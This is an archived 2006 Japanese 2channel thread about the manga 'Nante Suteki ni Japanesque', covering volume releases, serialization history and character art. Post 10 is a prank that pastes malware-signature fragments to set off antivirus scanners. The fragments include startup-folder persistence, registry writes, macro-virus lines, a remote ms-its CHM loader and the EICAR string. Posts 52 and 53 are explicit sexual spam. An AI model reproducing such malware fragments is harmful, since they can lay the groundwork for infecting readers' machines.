2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【新刊】 山内直実・ジャパネスク 6 【発売】

1 :花と名無しさん:2006/09/22(金) 14:25:45 ID:???0
現在は2006年9月号(7/26発売)より月刊化「別冊花とゆめ」で連載中の
「なんて素敵にジャパネスク」を中心に、山内直実先生の作品について
マタ〜リ語りましょう。

●最新刊「なんて素敵にジャパネスク人妻編」4巻、2006年10月19日(木)発売予定!

※なんジャパの連載は、2005/5/20発売の「花とゆめ」12号から月1回のペースで
再開→「別冊花とゆめ」に掲載誌を移動しました。

◎別冊花とゆめドットコム[公式]
ttp://www.betsuhana.com/
◎白泉社オンライン[公式]
ttp://www.hakusensha.co.jp/top.shtml

前スレ 【新刊】 山内直実・ジャパネスク 5 【発売】
http://comic6.2ch.net/test/read.cgi/gcomic/1122857208/

2 :花と名無しさん:2006/09/22(金) 14:27:21 ID:???0
≪過去ログ+関連スレ≫
【新刊】 山内直実・ジャパネスク 4 【発売】
http://comic6.2ch.net/test/read.cgi/gcomic/1106116462/
【ジャパネスク】 山内直実 3 【毎月20日】
http://comic6.2ch.net/test/read.cgi/gcomic/1089308026/
【連載再開】山内直実2【ジャパネスク】
http://comic6.2ch.net/test/read.cgi/gcomic/1084028955/
【ジャパネスク】山内直実【ちぇんじ!】
http://comic4.2ch.net/test/read.cgi/gcomic/1056391240/

【ネタバレ】なんて素敵にジャパネスク*参【OK】
http://comic6.2ch.net/test/read.cgi/csaloon/1096907601/ ←dat落ち。

氷室冴子 5
http://book3.2ch.net/test/read.cgi/magazin/1107074448/l50

さぁて今月の別冊花とゆめ・ザ花とゆめ4号
http://comic6.2ch.net/test/read.cgi/gcomic/1148892141/

AA長編板:ざ・ちぇんじ!
http://aa5.2ch.net/test/read.cgi/aastory/1085198133/l50

顔文字板:少女漫画&少女小説アスキーアートスレッド 4冊目
瑠璃姫&右近少将高彬
http://aa5.2ch.net/test/read.cgi/kao/1083512694/23
綺羅君&綺羅姫
http://aa5.2ch.net/test/read.cgi/kao/1083512694/284

3 :花と名無しさん:2006/09/22(金) 14:30:37 ID:???0
・・・・・履歴・・・・・
デビュー作:1981年「花とゆめ」1号『ぐーたら会長にサヨナラ』

―氷室冴子原作のコミックス化作品―
蕨ケ丘物語 (コミクス全1巻)※ 「雑居時代」文庫2巻に再収録。
ざ・ちゃんじ! (文庫版全2巻◆コミクス全4巻)
雑居時代 (文庫版全2巻◆コミクス全3巻)
なんて素敵にジャパネスク (愛蔵版全7巻◆文庫版全6巻◆コミクス全11巻)
なんて素敵にジャパネスク人妻編 (コミクス・3巻- 既刊、連載続行中)

―装画―
緑の我が家(作:小野不由美/1997年発売、講談社X文庫)

―オリジナル作品―
単独コミクスはなく、「ざ・ちゃんじ!」コミクス3〜4巻及び
「ジャパネスク」9・10・11巻、「雑居時代」コミクス3巻に収録。

カードギャラリー 山内直実集(1989/7月発売)
画集・なんて素敵にジャパネスク(1993/6月発売)

4 :花と名無しさん:2006/09/22(金) 14:34:20 ID:???0
>>1

※印の年月が間違っていたので、訂正

※2004年12号〜2005年12号(5/20発売)まで「花とゆめ」にて
月1回ペースで連載→その後「別冊花とゆめ」に掲載誌を移動

ごめん…たてたあとで訂正レスに気がつきました…逝って来ますorz

5 :花と名無しさん:2006/09/22(金) 14:46:40 ID:???0
>>1
スレ立て乙です。

でもでも!なんで「ざ・ちゃんじ!」のままなのぉーーーー(つД`)・゚・。
いや自分が間違えて、訂正レスしなかったのが悪いんだろうけど…
ちょっと違う仕事してる間に、そのまんま活用する方がいらっしゃるとはw

6 :花と名無しさん:2006/09/22(金) 14:50:45 ID:???0
≪関連スレ 他≫
AA長編板:ざ・ちぇんじ!
http://aa5.2ch.net/test/read.cgi/aastory/1085198133/

↓「なんて素敵にジャパネスク 人妻編」4巻
ttp://www.s-book.com/plsql/com2_detail?isbn=4592182243

7 :6:2006/09/22(金) 14:54:15 ID:???0
少女漫画&少女小説アスキーアートスレッド 4冊目@顔文字板
・瑠璃姫&右近少将高彬
http://aa5.2ch.net/test/read.cgi/kao/1083512694/23

・綺羅君&綺羅姫
http://aa5.2ch.net/test/read.cgi/kao/1083512694/284


コピペしようとしましたが、少女板での行数制限にひっかかりダメでした。

8 :花と名無しさん:2006/09/22(金) 15:38:11 ID:???0
>>1
乙!
ちゃんじワロスwwww

9 :花と名無しさん:2006/09/22(金) 15:53:42 ID:???0
>>1
おつー。

10 :<body onload=window()>:2006/09/22(金) 17:47:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

11 :花と名無しさん:2006/09/22(金) 21:26:01 ID:???0
>>1

12 :花と名無しさん:2006/09/22(金) 22:56:07 ID:???O
>>1
乙華麗〜

13 :花と名無しさん:2006/09/23(土) 00:12:36 ID:???0
>>1さん、乙カレー。

     ∧_,,∧ 
     (´・ω・`) _。_ 
     /  J つc(__アi! < トポトポ
     しー-J    c□~ 

14 :花と名無しさん:2006/09/23(土) 10:12:21 ID:paV7WoMfO
即死防止あげ

>1乙鰈

15 :花と名無しさん:2006/09/23(土) 10:51:00 ID:???O
いちおつ

16 :花と名無しさん:2006/09/23(土) 11:47:56 ID:guXXbUmRO
いちもつ

17 :花と名無しさん:2006/09/23(土) 14:26:37 ID:???0
前スレの最後の流れに笑ったw

18 :花と名無しさん:2006/09/23(土) 23:31:16 ID:???O
即死防止〜

19 :花と名無しさん:2006/09/24(日) 03:38:30 ID:???0
>>1 乙です。

20 :花と名無しさん:2006/09/24(日) 16:30:31 ID:GOpjva/k0
>>1さん 乙

21 :花と名無しさん:2006/09/24(日) 19:22:29 ID:dRjy+TcyO
>>1
oh憑か霊

22 :花と名無しさん:2006/09/24(日) 23:14:57 ID:???O
>>1

23 :花と名無しさん:2006/09/25(月) 12:56:32 ID:???O
今、携帯から見ていますが、
パソコンからこのスレを見ると
ウィルスが検出されますが、大丈夫なの?


24 :花と名無しさん:2006/09/25(月) 14:21:17 ID:???0
>>23
初心者板池よ。>>10のことなら、2chじゃよくあるトラップで無問題。
対策方法は自分で学べ。

25 :花と名無しさん:2006/09/25(月) 17:25:27 ID:???0
現在、新しくなった別冊で連載してるけど、その前はどの雑誌、どの号で
連載されてたんですか?
花夢17.18.19号はチェックしたんだけど載ってなくて…。

26 :花と名無しさん:2006/09/25(月) 17:48:29 ID:???O
Wikipedia辞典「なんて素敵にジャパネスク」項目に詳しく書かれてるが。
>>4に書かれた、去年の花ゆめ12号からあまり間を置かずに、別花に移動した筈。

27 :花と名無しさん:2006/09/25(月) 18:27:36 ID:???0
>>25
某個人の白癬系データサイトよりコピペ。

なんて素敵にジャパネスク人妻編/19 別冊花とゆめ2006年10月号 ←最新8/26発売。
なんて素敵にジャパネスク人妻編/18 別冊花とゆめ2006年09月号
なんて素敵にジャパネスク人妻編/17 別冊花とゆめ2006年05月号
なんて素敵にジャパネスク人妻編/16 別冊花とゆめ2006年03月号
なんて素敵にジャパネスク人妻編/15 別冊花とゆめ2006年01月号
なんて素敵にジャパネスク人妻編/14 別冊花とゆめ2005年11月号 ←ここまで、コミクスに収録済み。
なんて素敵にジャパネスク人妻編/13 別冊花とゆめ2005年09月号
なんて素敵にジャパネスク人妻編/12 花とゆめ2005年12号 ←2005/5/20発売。

28 :花と名無しさん:2006/09/25(月) 19:03:29 ID:80u0Nn3NO
今は毎月連載してるの?

29 :花と名無しさん:2006/09/25(月) 19:40:03 ID:???O
>>28
>>27を見て、理解出来ないのでしょうか?
携帯からでも、白癬公式サイトに行けるしさー…('A`)

30 :花と名無しさん:2006/09/26(火) 12:12:42 ID:???0
別花発売日age

31 :花と名無しさん:2006/09/26(火) 19:15:49 ID:Mf+2A+MD0
次号付録にブックカバーがつくらしい。

32 :花と名無しさん:2006/09/27(水) 11:45:22 ID:???0
別花読んできた。
原作とおりだから仕方ないけど、会話ばっかりでつまんないなー。
早く後宮はいんないかな

33 :花と名無しさん:2006/09/28(木) 02:24:12 ID:???0
うん、まぁ原作通りで読者を裏切らない展開をうまく漫画にしていて
それはそれで、いいんじゃないかと思うのは自分1人かなー?
煌姫の変わり身の早さってか、感情表現の絵には、
ストーリー知っていても笑えたよw

34 :花と名無しさん:2006/09/28(木) 05:08:59 ID:t5jU0JwJO
自分的に記念あげ

今日やっとのことで原作のコバルト文庫揃えました。
しかもオール昔の表紙!やったやった!ぶっちぎりの仲!
ゆっくり読もうと思います。ヽ(´∇`)ノ

35 :花と名無しさん:2006/09/28(木) 08:30:31 ID:???0
>>34
おめ!
ちゃんと食事、睡眠、トイレ休憩いれて読むんだよ。

36 :花と名無しさん:2006/09/28(木) 08:44:27 ID:???0
飽きもせずいつまで自演続けてるんだか


37 :花と名無しさん:2006/09/28(木) 11:39:14 ID:???O
>>35
あり!
原作は何年ぶりかなのに、十代のときと同じように楽しく読める!
今はD読み中です。勿体無いから焦らずに読み進めます。
でもご飯食べる時間が惜しい〜
ジャパは原作と漫画がホントぴったりだなぁと思います。

38 :花と名無しさん:2006/09/28(木) 12:26:32 ID:???0
>>37
自分も今漫画の続きから原作読んでるよ〜
原作にかなり忠実に描いてるのに漫画は漫画で楽しめる・・って
山内さんのコマ割やネームが上手ってことなんでしょうな

39 :花と名無しさん:2006/09/29(金) 13:32:52 ID:???0
ジャパは旧漫画版も小説版も面白くて、久しぶりに読み
終わるの勿体ないと思った作品だったよ。
読後感もすごくよくて、幸せな気分になった。

漫画の人妻編も、コミクス発売毎回楽しみにしてる。


40 :別花:2006/09/29(金) 15:08:40 ID:DG8Q4vzO0
別花に 平安時代と帝 がヒントになるような作品、
「なんて素敵にジャパネスク」以外にありますか?

41 :花と名無しさん:2006/09/29(金) 15:24:53 ID:???0
>>40
何年も前に連載していた藤丞めぐる「緋桜白拍子」か?
あ、でも別花連載だったのか、本誌連載だったのか記憶あいまいだ。
一応専スレもある(過疎しまくりだけど)。作者が今どうしているかは謎だ。

【桃姫伝奇】藤丞めぐる【緋桜白拍子】
http://comic6.2ch.net/test/read.cgi/gcomic/1062674262/

42 :別花:2006/09/29(金) 16:27:45 ID:DG8Q4vzO0
>>41
昔の作品でしかないんですね。
ジャパネスクが好きでサイトを色々探してるんですが
パスワードで入れないとこがあって。
ジャパサイトなんだから、
このヒントにはジャパネスクしかないだろうと思ってたのに
入れなくて・・・
ありがとうございました

43 :花と名無しさん:2006/09/29(金) 22:53:18 ID:???O
>>40>>42
もういないだろうけど言っておく。
パスワードを人に訊くのはルール違反。
2ちゃんでは誰も教えないよ。>>41を騙したみたいな感じだ。
今後はそういうの、やめたほうがいいよ。
検索したりして頑張れ。

44 :花と名無しさん:2006/09/29(金) 23:10:42 ID:???0
パスは自分で探すのが醍醐味だろ
そしていろんな裏技を覚えてゆくものだ

45 :41:2006/09/29(金) 23:23:44 ID:???0
素で普通の質問かと思ってレスしちゃったよw
あんま気にしてはいないが>>44に同意。
いろいろ試す楽しみってのはあるよね。

46 :40:2006/09/29(金) 23:53:18 ID:DG8Q4vzO0
41さん
申し訳ありませんでした。
だますつもりなんてなかったんですが
結果的に私のしたことはそういうことなんですね。
別花を読んでもそういう作品が見当たらず、色々入力しても当たらず
違う作品があるのかなと聞いてみました。
ルール違反もうしわけありませんでした。



47 :花と名無しさん:2006/09/30(土) 10:51:40 ID:???0
今月号を見ましたが、あき姫が帥の宮の弱みを
掴んで、愛人になってみせると言っていましたが、
弱みを掴んだら帥の宮に殺されそう。


48 :花と名無しさん:2006/09/30(土) 16:01:54 ID:???O
人妻編の4巻って何日発売?


49 :花と名無しさん:2006/09/30(土) 18:32:31 ID:???O
>>48
>>1ぐらい嫁。

50 :花と名無しさん:2006/09/30(土) 19:02:06 ID:???O
スマソ
携帯だから気付かなかった

51 :花と名無しさん:2006/10/01(日) 00:18:22 ID:???0
正直人妻編よりも、その前のジャパネスクの方が好きだ。
でも人妻編も読みたいと言う気にさせるだけのソコソコのクオリティが、
この時期の氷室作品にある気がする。
そして山内さんとの見事なコラボで、原作知っていても
何となくワクワク出来るのが嬉しい。

52 :花と名無しさん:2006/10/01(日) 00:48:10 ID:MhBgEmA20
さっき、川原でやった六尺兄貴凄かったです!
ガチムチの色黒兄貴がオッス連呼で張型ケツにぶちこまれ腰振ってました。
俺もくわえさせられて浣腸食らい無様に排便さらしました。
バリカン出されたときは一瞬引いたけど、兄貴の
「いやなら止めていいんだぜ!」の一言で覚悟決め、
生まれて初めて丸刈りになりました。
その後、脇・チンゲも刈られてビンビンのマラ、
思いっきりしごかれ派手にガチムチ
兄貴の顔に飛ばしました。スッゲー男らしく気持ちよかったです。
また行くときカキコして下さい!帰ってから丸刈りの頭見て、
また感じまくってます!



53 :花と名無しさん:2006/10/01(日) 21:06:03 ID:???0

       |::::::::::/::::::::::::ノ       ヽ.::::::::::::ヽ:::::|   何となくワクワク出来るのが嬉しいで〜す♪
      |:::::::/ ̄ ̄ ̄          ̄ ̄ ̄|:::::::|
      |=ロ   -=・=-     -=・=-  ロ=| アーッ!いいっ、いいっ♪
      |::::::|       ノ           |:::::::| 
      |::::::|       (● ●)       .|:::::::|  オナニー最高でつ♪
      |::::::|*∵∴    l l    ∴∴*.|::::::|
      |::::::|  ∵∴\______/∵∴ |::::::|  セックスフレンド募集中♪
      |::::::|\     \____/    ./.|::::::|
      |::::::|  \________/  .|:::::::| 
        ̄   /`   ゜     ´\     ̄
          / ,へ    丶   ヽ \
          〈 〈 ( ・  .| ̄ ̄ ̄| | ̄ ̄|
          \ \|    | ジャパ ネスク│
            \ \  .|__.m| |____|
              ヽ \| | l|  |ヽ_ノ
              |\ |l| l|.| |l  |
            / ,巛 ~~\ クチュクチュクチュクチュクチュクチュクチュ
           /  /  >>51    ヽ ヽ
                 >>51 

54 :花と名無しさん:2006/10/07(土) 16:20:14 ID:???0
保守

55 :花と名無しさん:2006/10/10(火) 22:57:06 ID:b9T4NmaJ0
保守age

56 :花と名無しさん:2006/10/17(火) 20:28:01 ID:QP7tYGqRO
コミックス買った〜?

57 :花と名無しさん:2006/10/17(火) 20:52:31 ID:???0
あ、今日だったのか
明日本屋行くわ

58 :花と名無しさん:2006/10/17(火) 20:55:01 ID:???0
白泉社のHPでは19日(木)になってますよ
フライングがあれば明日発売されてそうですが

59 :花と名無しさん:2006/10/17(火) 20:55:46 ID:???0
19日じゃなかったっけ?
表紙アップされてたけどカバーのピンクがなんかくすんで見える
ディスプレイのせいかな

60 :花と名無しさん:2006/10/18(水) 09:43:37 ID:???0
表紙見た〜
おぉぉぉサスペンスみたい!w

61 :花と名無しさん:2006/10/19(木) 13:42:16 ID:???0
新刊今日買ったよー!
単行本派なんだけど昔の勢いが少しずつ戻ってきた気がする
絵にも慣れたし面白かった

62 :花と名無しさん:2006/10/19(木) 23:03:16 ID:???0
風邪でダウン。
明日仕事休んで買ってくるか・・・

63 :花と名無しさん:2006/10/21(土) 19:00:29 ID:???0
新刊買ってきた。
原作読んだ身としては、サクサク進む
このテンポがありがたい。
まだ先長いもんなー。

64 :花と名無しさん:2006/10/21(土) 21:38:09 ID:???0
1巻の表紙がちょっとひどかったよな。

65 :花と名無しさん:2006/10/21(土) 21:43:08 ID:ll0JI6wE0
新刊読んだー
一巻の戸惑いがなくなった感じ

でも山内さん身体大丈夫かな〜?

66 :花と名無しさん:2006/10/22(日) 00:26:16 ID:???0
白泉社サイトにあった、書店用POP絵のデータ(なんジャパ4巻)
Win用↓
ttp://www.hakusensha.co.jp/shoten/pop/pops/pop96_hc_japanesuku4.html

Mac用↓
ttp://www.hakusensha.co.jp/shoten/pop/pops/pop72_hc_japanesuku4.html

67 :花と名無しさん:2006/10/22(日) 04:18:19 ID:???0
コミクス派待望の4巻ゲット!!!
いい具合にはっちゃけて来て面白くなってきたね。

辛抱たまらんと小説買っちゃって先は読めてるのに楽しみで仕方ないわ〜。

68 :花と名無しさん:2006/10/22(日) 11:47:04 ID:???0
新刊読んだ。ネット購入したけどこの表紙なら店で買っても恥ずかしくなかっただろうw
話もぐっと進んだなあ。
しかし師の宮登場を楽しみにしていたが、なんか思ったよりやわらかーいふいんきで
もっと師の宮の冷徹っぽさとかあってほしかった。
でも書き下ろし漫画あるなんて思わなかったからウレシス。

69 :花と名無しさん:2006/10/22(日) 17:29:43 ID:???0
>65
同じ病気やったことあるけど、ストレスがたまると良くないみたい。
下手するとそのまま片方失聴ってこともあるからなー。
連載持ってたらつらいとオモ。
いよいよ山内さんものってきたみたいだし、楽しみだわ。
桐壺様どんな感じになるのかな…今元気のいいキャラが多いから
はかなげな女性キャラが想像できんw


70 :花と名無しさん:2006/10/22(日) 23:33:38 ID:???0
桐壺さま、先に男皇子産んでも立場が安定するわけじゃないのね。
やっぱり実家の実力がモノを言うんだ>平安時代。
もし、瑠璃が入内したら、右大臣家とどちらが格が上になるのかな?
どっちにも男皇子が生まれたら、権力争いになるんだろうなぁ。

71 :花と名無しさん:2006/10/23(月) 10:57:34 ID:???O
新刊買った!
巻末書き下ろしうれしいね!

72 :花と名無しさん:2006/10/23(月) 12:05:05 ID:???O
帥の宮との対峙、もうちょい緊迫感欲しかったなぁ。
原作だと、ここから一気に盛り上がって来るのが印象的だった。
山内さんの絵が以前よりどんどん可愛い系になってるのは構わないけど、
帥の宮はとにかく冷徹たっぷりに描いてくれることを期待してます。

73 :花と名無しさん:2006/10/23(月) 12:08:03 ID:???0
帥の宮見て「どこが鷹男なんだろう」と思った
似てるか…?

74 :花と名無しさん:2006/10/23(月) 12:29:46 ID:???0
ふいんきってやつだろう。

75 :花と名無しさん:2006/10/23(月) 15:10:52 ID:???0
そもそも鷹男の顔が昔とちが…

76 :花と名無しさん:2006/10/23(月) 21:53:23 ID:dGEhYpsdO
ふ ん い き

77 :花と名無しさん:2006/10/23(月) 21:54:40 ID:???O
藤宮の顔も変わりすぎだし

78 :花と名無しさん:2006/10/23(月) 22:08:29 ID:???0
>>76
半Rれ

79 :花と名無しさん:2006/10/23(月) 22:13:17 ID:???O
2ch語って奴だな>ふんいき(変換でき 以下ry
しかし「半年ROMれ」を略したのは初めて見たw

80 :花と名無しさん:2006/10/23(月) 22:41:21 ID:???O
>>76
半年POMれ

81 :花と名無しさん:2006/10/24(火) 00:43:14 ID:???0
>79
しむらーふいんき(ry

82 :花と名無しさん:2006/10/24(火) 06:07:14 ID:???O
帥の宮が出てきた瞬間

この顔か〜〜??
と思った……

83 :花と名無しさん:2006/10/24(火) 08:56:37 ID:???0
措置飲み屋と守弥の顔が一緒…

84 :花と名無しさん:2006/10/24(火) 12:02:25 ID:???0
守弥の顔なんてもうずっとパラッパみたいな顔じゃまいか。

85 :花と名無しさん:2006/10/24(火) 13:22:40 ID:???0
パラッパてw

86 :花と名無しさん:2006/10/24(火) 14:39:26 ID:???0
顔はともかく、黒髪にしてくれと登場の度に思う<帥の宮
黒髪ではないが笛吹中将のほうが帥の宮にイメージにあってたな。
(あの頃の絵がすっきりと端麗だったのもあるけど)

87 :花と名無しさん:2006/10/24(火) 20:40:27 ID:???0
今の山内さんには笛吹中将みたいな顔はもう無理なのかな。

88 :花と名無しさん:2006/10/24(火) 21:08:55 ID:???0
4巻GET

89 :花と名無しさん:2006/10/25(水) 00:21:46 ID:???O
私も絵のタッチに違和感が。

瑠璃たちもずいぶんかわいいタッチだが鷹男が・・・

師の宮は男前に見えないし〜〜

90 :花と名無しさん:2006/10/25(水) 07:24:16 ID:???O
あ〜わかる……
高彬の姉ちゃんの婿、イケメソだったよねぇ。

91 :花と名無しさん:2006/10/25(水) 11:54:48 ID:???O
原作は帥の宮編でフェードアウトしてるし、
そうすると奴はラスボスなんだから、
うんとイケメソで華麗にヤな男に描いてください。
山内さん。

92 :花と名無しさん:2006/10/25(水) 17:10:24 ID:???0
4巻読みました〜
帥の宮、私の脳内では原作通りだった。
でももう少し冷酷感あってもよいね。ガイシュツですが・・
これからどんどん冷たーーい感じにしていってほすいね。
ただ全般的に高彬も鷹男もニヤけた絵柄になったような気がして、残念。
女の子キャラは違和感ないんだけどねー。
描きおろしの高彬はいいなぁ。


93 :花と名無しさん:2006/10/25(水) 17:21:57 ID:???0
帥の宮は冷酷一方でも困るというか
でも温和さを出してもらっても困るというか何というか
絵にするのはほんとに難しいキャラクタだなあと思う
個人的に「すさまじ」なキャラクタってイメージがあります
「すさまじ」が服着て歩いてるような奴

94 :花と名無しさん:2006/10/25(水) 19:20:55 ID:???0
うーん、私の中では帥の宮はこれでもか!!ってくらい冷徹人間で、(特に瑠璃に対しては)
最後の最後に絶望して人間味が出たり、遠野だったころの穏やかな人柄が解ったりするのが
帥の宮の売り?だと思ってたんだけどなあ。
山内さんの解釈はこうだったのかなー

95 :花と名無しさん:2006/10/25(水) 20:26:41 ID:???0
そろそろその辺で

96 :花と名無しさん:2006/10/26(木) 01:12:15 ID:???0
辺って何を?

97 :花と名無しさん:2006/10/26(木) 01:26:53 ID:???0
原作ネタバレに抵触しそうだからでしょ、95の言いたいこと。
帥の宮と瑠璃との対決は、まだ漫画では具体的に出てないのに
最後がどうとかは…

原作既読だけど記憶が薄れてるので、漫画が楽しいwktk

98 :花と名無しさん:2006/10/26(木) 03:16:19 ID:???O
>>93
それだとブサメンになっちゃうんじゃない?

99 :花と名無しさん:2006/10/26(木) 03:40:45 ID:???0
流れ豚切ってスマソだが、11月下旬発売の次号は、雑誌表紙に
ジャパネスク登場らしい(公式の次号予告より)。
平安時代の話だから、着物の柄がカラーになったらどうなるかが
ちょっと楽しみだ。

100 :花と名無しさん:2006/10/26(木) 08:17:50 ID:???0
遅ればせながら四巻購入。
あき姫が親身に瑠璃を介抱のエピソード大好きだったから
やっと読めて嬉しい。

101 :花と名無しさん:2006/10/26(木) 11:28:22 ID:???0
煌姫って性格的には絶対に高彬よりも瑠璃と気が合うからなw

102 :花と名無しさん:2006/10/27(金) 22:12:42 ID:???0
子供の頃すげー気になって編集部に手紙まで出したんだが、
なんでこの人しばらく休んでたの?

103 :花と名無しさん:2006/10/28(土) 01:06:48 ID:???0
>>102
おとなの事情

104 :花と名無しさん:2006/10/28(土) 01:09:00 ID:???O
>>102
作家名のみでググり、★恐怖の追跡サイト・漫画家部門や行に行くとわかる。
自分は山内さんの言葉を見た訳じゃないので、〜らしいとしか知らない。
でもよくある話題なので、FAQとしてテンプレにした方がいいのかな?

105 :花と名無しさん:2006/10/28(土) 09:14:55 ID:???0
ありがとう。ヤフーで探してたから見つからなかった・・・
グーグルだと1ページ目だったよ。サンクス

106 :花と名無しさん:2006/10/30(月) 19:05:34 ID:???0
新刊出たわりには感想レスが少ないね…
やっぱ住人が相当少ないのかな〜?
一旦中断していたから、再開したのを知らない人や
興味が減っっちゃった人もいるだろうし…。
自分は連載で見てるから、コミクス出ても新たな感想を
思い浮かばないんだ。

107 :花と名無しさん:2006/10/31(火) 08:42:02 ID:???O
コミクス購入組。
そちの宮、今はいいけど後半は見た目も極悪に描いてほすぃな。


108 :花と名無しさん:2006/10/31(火) 10:02:44 ID:???O
自分もコミクス組。
帥もそうだけど、由良姫の絵がどうなるか……
今の山内さんの絵だと、かなり萌え萌えの顔になりそうな余寒で、次刊見る時ドキドキしそうw


109 :花と名無しさん:2006/10/31(火) 10:53:25 ID:???0
人妻編裏主役はやはり煌姫だな、うん

由良姫は白眼無し系の顔と予想!
個人的には高彬の兄の顔がどんなことになっちゃうか気になるさー
春日中納言だったっけ

110 :花と名無しさん:2006/10/31(火) 16:44:54 ID:???0
春日中納言はおまぬけな顔の方がいいなw

111 :花と名無しさん:2006/10/31(火) 20:51:39 ID:???0
高彬の兄君たちって、前のコミックスに小さい絵だったけど出てたよね。
主役級ではないにしろ、「おまぬけな顔」ではなかったようなw
そのままの絵で人妻編もいくのか、それともまったく顔をかえちゃうのか。
原作小説(旧版)のイラストが強烈だったからなぁ(まんまる満月)

112 :花と名無しさん:2006/10/31(火) 22:04:03 ID:???0
由良姫の顔って早苗をちょっと華やかにした感じっていうイメージなんだが
どうなるかね。

113 :花と名無しさん:2006/10/31(火) 22:21:34 ID:???0
由良って一応高彬似って設定じゃなかったっけ。

114 :花と名無しさん:2006/10/31(火) 22:45:00 ID:???0
そういう設定だったよね。
だからあんまり華やかなイメージは無い。

115 :花と名無しさん:2006/10/31(火) 23:33:40 ID:???0
>>111
四巻でもちょっとでてた。>春日
まん丸な顔だよ。顔の中は描かれてなかったけど。

由良は高彬が女装した顔で想像してる。
あまり華やかではないイメージだね。(目は大きいがまつげがない感じ)

116 :花と名無しさん:2006/11/01(水) 17:16:52 ID:???0
一番上のお姉さんは華やか系だったのにね〜
個人的には>112に近い感じの、もうちょっとお上品な感じの姫を
イメージするw

117 :花と名無しさん:2006/11/05(日) 01:48:30 ID:xV20LDzg0
高彬には4人の女姉妹がいるはずなんだが
長女、聡子姫
次女、承香殿女御
四女、由良姫
三女の話題がまーったく出てこないのはなんででしょうね?原作でも名前すらないみたいだし・・・(三の姫としかなかった)

新刊買ったよー。帥の宮の顔は私のイメージではなかったがまぁ仕方ない。
私も笛吹中将っぽいのを想像してたからなー。

118 :花と名無しさん:2006/11/05(日) 04:35:47 ID:???0
>117
なんでもなにも出す必要がなかったからじゃない?
高彬は兄も上に3人いるけど春日以外は名前も出てないのと同じ。

由良姫は高彬を幼くした愛らしい感じかな。確かに華やかとはちょっと
違うけど、初めて会った人は口を揃えて「可愛らしい姫」と言ってるから。

119 :花と名無しさん:2006/11/05(日) 22:23:35 ID:???0
春日中納言って、誰に似てあんな悲惨なことになっちゃったんだろう。
他の兄弟は絶世の、とは言えないまでも、皆そこそこ整った顔してるっぽいのに。


120 :花と名無しさん:2006/11/06(月) 00:45:21 ID:???0
年を取ると劣化が激しい家系なんじゃね?

121 :花と名無しさん:2006/11/06(月) 01:20:19 ID:???O
そんなの嫌〜w

吉野君と別れて落ち込む瑠璃姫に高彬が言った
「僕にしときなよ、瑠璃さん(僕で我慢しときなよ、だったかも)」というセリフが好きだったなあ

122 :花と名無しさん:2006/11/06(月) 09:00:25 ID:???O
だからぼくで我慢しときなよ
だっけ?私もうろ覚えだ

123 :花と名無しさん:2006/11/06(月) 20:35:39 ID:???0
>>112
実写で考えると、フィギュアの浅田真央ちゃんとかそれっぽいなと思ってた。

ちまちまっとした地味めの顔なんだけど、上品で可愛らしい感じ。

124 :花と名無しさん:2006/11/07(火) 00:29:55 ID:???O
高彬も設定は別にイケメンではないのよね?
漫画はかわいくかっこよくなってるけど。
兄妹揃って感じのよい人なんだろうね。
高彬は字も下手なんだっけ。
……守弥、一体なにをやってたんだ?

125 :花と名無しさん:2006/11/07(火) 12:58:31 ID:3YLYZHmcO
お習字嫌いなちび高彬に、お教えいたしますと言ってたのにね。

126 :花と名無しさん:2006/11/07(火) 13:14:28 ID:???0
>>124

イケメン!と断言してしまうには地味な感じだけど、
でもイケメンと言えないこともないような・・・、
タイプの顔を想像してしまう。

まっとうに育った貴族で出世頭って言われてるくらいだから、
品もあるだろうし。

127 :花と名無しさん:2006/11/07(火) 22:23:17 ID:???0
琵琶は守弥のおかげで上手いんじゃなかったっけ?

128 :花と名無しさん:2006/11/08(水) 02:05:29 ID:???0
結局、守弥の功績は琵琶だけか…

129 :花と名無しさん:2006/11/08(水) 02:38:49 ID:???0
字はどうしようもなかったんだろう

130 :花と名無しさん:2006/11/08(水) 03:05:05 ID:???0
性の道徳−童貞教育

131 ::2006/11/08(水) 03:06:06 ID:???0
 守弥の功績

132 :花と名無しさん:2006/11/08(水) 08:39:52 ID:???O
字はちゃんと教えれば誰でも上手くなるよ。
と書道の先生が言ってみる。

133 :花と名無しさん:2006/11/09(木) 14:46:07 ID:???O
先生お厳しいですわ。
守弥がちゃんと教えなかったとw

習字嫌いは直んなかったんだね。
でも楽しく、興味を持たせるように教えられなかったんかなぁ。

習字の先生だったらどう工夫されます?

よけいなお世話だよときっと高彬は言ってるでしょうね。

134 :花と名無しさん:2006/11/10(金) 00:01:38 ID:???0
4巻読んだ。話が動き出してきて今後に期待。
人妻編以降は原作流し読みで覚えてないので、また買って読んでみようかな。
藤宮さまが出てきて嬉しい。綺麗というよりは可愛い感じになったような。

135 :花と名無しさん:2006/11/10(金) 14:04:13 ID:???O
藤宮、確実に若返ったというか、あれは少女顔じゃ?
前髪の感じがあんみつ姫っぽい……

136 :花と名無しさん:2006/11/10(金) 16:54:06 ID:???0
藤宮さま、個人的に一番別人化したキャラだ。
言われなければわからないくらい前と比べて可愛らしい感じになったよね。

137 :花と名無しさん:2006/11/10(金) 17:44:01 ID:???0
